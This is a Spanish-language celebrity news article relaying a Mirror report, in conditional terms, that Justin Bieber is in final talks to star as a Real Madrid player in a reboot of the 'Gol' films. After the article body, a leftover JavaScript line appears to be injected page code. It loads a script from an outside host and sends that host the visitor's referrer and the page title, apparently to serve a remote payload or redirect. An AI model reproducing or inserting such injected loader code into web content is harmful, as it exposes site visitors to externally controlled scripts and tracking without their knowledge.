No es broma, Justin Bieber jugará en el Real Madrid

El cantante canadiense estaría en la etapa final de su negociación para interpretar a un jugador del conjunto blanco

Real Madrid @realmadrid es uno de los clubes más importantes a nivel internacional, por lo que en Hollywood se prepeara una película sobre el club la cual sería protagonizada por Justin Bieber @justinbieber.

.De acuerdo con el diario Mirror, el cantante canadiense se encontraría en la etapa final de la negociación en la producción que tendría un presupuesto de más de 131 millones de dólares.

Bieber haría mancuerna en la pantalla con el astro portugués Cristiano Ronaldo y uno de los representantes más importantes de jugadores en Europa.

Parte de la trama del filme sería que el canadiense es un joven jugador de un club en Los Angeles que es descubierto por un visor de los Merengues y es llevado al club Real Madrid, donde se convierte en toda una sensación.

La publicación continúa mencionando que parte de la grabación será en el Santiago Bernabéu, además de que se rodará durante algunos partidos del conjunto blanco.

Esta nueva película sería el reinicio de la franquicia Gol, la cual tuvo como protagonista a Kuno Becker, como el jugador Santiago Múñez.

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios